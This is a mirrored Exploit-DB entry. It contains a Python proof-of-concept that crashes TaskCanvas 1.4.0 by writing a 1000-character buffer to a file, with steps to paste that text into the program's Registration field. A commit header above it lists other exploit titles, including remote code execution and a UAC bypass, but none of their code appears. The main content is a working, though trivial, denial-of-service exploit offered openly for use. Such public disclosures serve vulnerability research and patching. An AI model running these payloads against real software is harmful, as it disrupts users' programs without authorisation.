exploit-db-mirror/exploits/windows/dos/47911.py
Offensive Security 83d2726c75 DB: 2020-01-14
14 changes to exploits/shellcodes

SpotDialup 1.6.7 - 'Name' Denial of Service (PoC)
SpotOutlook 1.2.6 - 'Name' Denial of Service (PoC)
Top Password Software Dialup Password Recovery 1.30 - Denial of Service (PoC)
Backup Key Recovery 2.2.5 - 'Name' Denial of Service (PoC)
TaskCanvas 1.4.0 - 'Registration' Denial Of Service
Top Password Firefox Password Recovery 2.8 - Denial of Service (PoC)
Advanced System Repair Pro 1.9.1.7 - Insecure File Permissions
Allok Video Converter 4.6.1217 - Stack Overflow (SEH)
Allok RM RMVB to AVI MPEG DVD Converter 3.6.1217 - Stack Overflow (SEH)
Microsoft Windows 10 build 1809 - Local Privilege Escalation (UAC Bypass)
Chevereto 3.13.4 Core - Remote Code Execution
Citrix Application Delivery Controller and Gateway 10.5 - Remote Code Execution (Metasploit)
Digi AnywhereUSB 14 - Reflective Cross-Site Scripting
2020-01-14 05:02:00 +00:00

33 lines
No EOL
962 B
Python
Executable file

# Exploit Title: TaskCanvas 1.4.0 - 'Registration' Denial Of Service
# Exploit Author : Ismail Tasdelen
# Exploit Date: 2020-01-06
# Vendor Homepage : https://www.digitalvolcano.co.uk/
# Link Software : https://www.digitalvolcano.co.uk/taskcanvasdownload.html
# Tested on OS: Windows 10
# CVE : N/A
'''
Proof of Concept (PoC):
=======================
1.Download and install TaskCanvas
2.Run the python operating script that will create a file (poc.txt)
3.Run the software "Registration -> Enter Registration Code
4.Copy and paste the characters in the file (poc.txt)
5.Paste the characters in the field 'Registration' and click on 'Ok'
6.TaskCanvas Crashed
'''
#!/usr/bin/python
buffer = "A" * 1000
payload = buffer
try:
f=open("poc.txt","w")
print("[+] Creating %s bytes evil payload." %len(payload))
f.write(payload)
f.close()
print("[+] File created!")
except:
print("File cannot be created.")